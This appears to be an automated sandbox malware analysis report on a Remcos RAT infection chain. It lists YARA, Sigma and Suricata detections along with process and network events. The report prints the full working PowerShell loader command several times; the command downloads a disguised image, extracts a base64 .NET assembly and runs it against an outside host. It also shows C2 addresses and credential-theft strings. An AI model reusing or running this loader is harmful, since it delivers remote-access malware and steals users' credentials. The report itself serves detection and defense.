Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i

16 further memory dump entries not shown.

Source: 14.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 14.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_UACBypassusingCMSTP
Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 14.2.RegAsm.exe.400000.0.unpack
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x6aaa8:$a1: Remcos restarted by watchdog!
  • 0x6b020:$a3: %02i:%02i:%02i:%03i

Source: 14.2.RegAsm.exe.400000.0.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b6c:$str_b2: Executing file:
  • 0x65bec:$str_b3: GetDirectListeningPort
  • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65718:$str_b7: \update.vbs
  • 0x64b94:$str_b9: Downloaded file:
  • 0x64b80:$str_b10: Downloading file:
  • 0x64c24:$str_b12: Failed to upload file:
  • 0x65bb4:$str_b13: StartForward
  • 0x65bd4:$str_b14: StopForward
  • 0x65670:$str_b15: fso.DeleteFile "
  • 0x65604:$str_b16: On Error Resume Next
  • 0x656a0:$str_b17: fso.DeleteFolder "
  • 0x64c14:$str_b18: Uploaded file:
  • 0x64bd4:$str_b19: Unable to delete:
  • 0x65638:$str_b20: while fso.FileExists("
  • 0x650b1:$str_c0: [Firefox StoredLogins not found]

Source: 14.2.RegAsm.exe.400000.0.raw.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

15 further unpacked PE entries not shown.

Exploits

Source: Network Connection
Author: Joe Security
Data: DestinationIp: 107.172.31.21, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3972, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170

Source: File created
Author: Joe Security
Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3972, TargetFilename: C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs

System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? 
? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
Source: Network Connection
Author: Max Altgelt (Nextron Systems)
Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3972, Protocol: tcp, SourceIp: 107.172.31.21, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled in extraction, omitted]
                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Source: Process started, Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled in extraction, omitted]
                Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2780, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", ProcessId: 1764, ProcessName: RegAsm.exe
                Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled and truncated in extraction, omitted]
                Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled and truncated in extraction, omitted]
                Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3368, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled in extraction, omitted]
                Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3672, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3084, TargetFilename: C:\Users\user\AppData\Local\Temp\ru3ofdm4.k0x.ps1

                Data Obfuscation

                Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[UTF-16 base64 blob, garbled and truncated in extraction, omitted]

                Stealing of Sensitive Information

                Source: Registry Key setAuthor: Joe Security: Data: Details: 77 A9 80 9E 90 2C B8 6C 51 BA A5 B2 8E A0 16 C7 79 D0 CC 92 08 78 EC 20 68 CF E2 8F A1 4B DE A4 4E 3B 44 07 84 89 BB 52 B7 F6 66 B9 84 EE 49 49 A7 72 B3 8C 9D E0 39 B5 2D C9 20 F9 BF 26 10 6C 21 F5 FC 78 E6 40 52 82 2A 39 1D 19 F1 FC 37 85 40 FD 38 55 FE 96 C3 B0 43 02 77 EB 3D 1C 38 07 1B 75 19 AC EF 04 FA 29 66 07 FE 4F 4E D5 08 7D 33 BA , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\Software\Rmc-R2I0JW\exepath
                Timestamp:2024-08-28T06:54:12.164040+0200
                SID:2049038
                Severity:1
                Source Port:443
                Destination Port:49171
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-28T06:54:14.551269+0200
                SID:2036594
                Severity:1
                Source Port:49173
                Destination Port:14645
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T06:54:13.540932+0200
                SID:2020423
                Severity:1
                Source Port:80
                Destination Port:49172
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T06:54:13.540932+0200
                SID:2020424
                Severity:1
                Source Port:80
                Destination Port:49172
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T06:54:16.039220+0200
                SID:2036594
